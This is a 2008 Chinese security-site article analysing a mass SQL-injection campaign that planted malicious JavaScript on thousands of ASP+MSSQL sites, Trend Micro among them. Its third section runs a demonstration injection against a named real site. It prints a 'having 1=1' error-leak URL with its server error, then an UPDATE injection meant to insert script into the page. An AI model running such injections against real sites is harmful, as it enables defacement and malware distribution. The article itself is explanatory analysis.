通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 爱心红客 电信网通铁通移动 在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
对趋势科技等数万网站被攻击的分析
责任编辑:酷酷の鱼   更新日期:2008-5-4
 

BY: rayh4c.cn
一. 首先在网上找到了这次攻击的新闻报道

http://www.nsfocus.net/news/6697

http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html

通过GOOGLE搜索到了相关被黑的页面

http://www.google.cn/search?hl=zh-CN&q=site%3Atrendmicro.com++www.2117966.net+fuckjp.js&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f

趋势科技的页面被插入过http://www.2117966.net/fuckjp.js相关的JS挂马。

 

二. 直接查找这个JS相关的信息

http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net+fuckjp.js&meta=&aq=f

发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了JS挂马。

通过分析发现被黑的页面都有如下特征:

1.被修改页面的网站都是ASP+MSSQL的架构。

2.被修改的页面都存在SQL注入漏洞


三. 取了其中一个被挂马页面做了SQL注入挂马的模拟攻击:

1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162

这个链接存在明显的SQL注入,对person参数注入语句having 1=1,将暴出当前页面注入点的表名为coordinator,字段名ShCoordinatorSurame。

http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1

—————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
—————————-

2. 修改暴出的当前页面的表名,字段名内容为插入JS的代码来实现挂马

http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator set ShCoordinatorSurame=’’ where 1=1––

修改coordinator 表 ShCoordinatorSurame 字段内容为,同时设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容.

就可以实现在有SQL注入点的页面直接挂马。


四.总结.

这次大规模攻击的流程应该是自动化的:

1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞

2.针对漏洞攻击,进行自动化的SQL注入挂马。

现今虽然SQL注入漏洞已经很老了,但是这次黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。

  • 上一篇文章:
  • 下一篇文章: 没有了
  • 最近更新
    固顶文章 企业网络组建与维护班正式开课
    普通文章 瑞星公司05月04日发布 每日计算机病毒及木马播报
    普通文章 绝密!为WindowsXP系统设置一个隐形密码
    普通文章 脚本安全的本质 PHP+MYSQL
    普通文章 网络安全只需要对症下药 给自己系统设道安全防线
    推荐文章 推荐:揭开迅雷无种子也能BT下载之谜
    普通文章 对趋势科技等数万网站被攻击的分析
    普通文章 社会工程学入侵三部曲
    普通文章 用python修改注册表干掉360safe
    普通文章 Novell GroupWise客户端 HTML注入及拒绝服务漏洞
    热门文章
    普通文章黑客破解美总统参选人网站 并导向竞选对手网站
    普通文章"蠕虫"攻击韩总统府电脑 非机密资料遭泄露
    普通文章"灰鸽子"变种泛滥 给用户隐私安全带来隐患
    普通文章病毒"大胃王"可同时盗取多款网游账号
    普通文章微软承认 Windows提升权限安全漏洞 但未承诺修补
    普通文章微软Windows XP SP3向制造商发货 用户月底可下载
    普通文章Firefly媒体服务器Content-Length字段堆溢出漏洞
    普通文章MPlayer sdpplin_parse()函数 RTSP 整数溢出漏洞
    普通文章攻击木马--远程控制软件自身的漏洞你注意了吗
    普通文章用vbs写的短小精悍的字典生成器
    精彩专题